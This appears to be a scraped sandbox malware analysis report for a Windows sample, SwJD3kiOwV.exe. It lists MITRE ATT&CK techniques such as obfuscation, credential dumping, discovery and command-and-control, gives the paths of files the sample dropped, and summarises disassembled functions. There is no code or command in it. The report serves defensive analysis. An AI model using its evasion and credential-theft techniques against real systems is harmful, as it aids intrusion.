Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SwJD3kiOwV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SwJD3kiOwV.exe_46488af911677c9affb27f13a16d23e8aaa82ce_2c4ab7d8_0f0f28b5-d9e5-4c1f-9582-48889b5c13b7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FD4.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9498.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9516.tmp.xml

C:\Users\user\AppData\Local\Temp\ehoYPkfWhVokJMBQaExv.dll

C:\Users\user\AppData\Local\Temp\service123.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Windows Analysis Report
SwJD3kiOwV.exe

Function 001C116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 001C15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 6C9C14B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 6C9D9C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre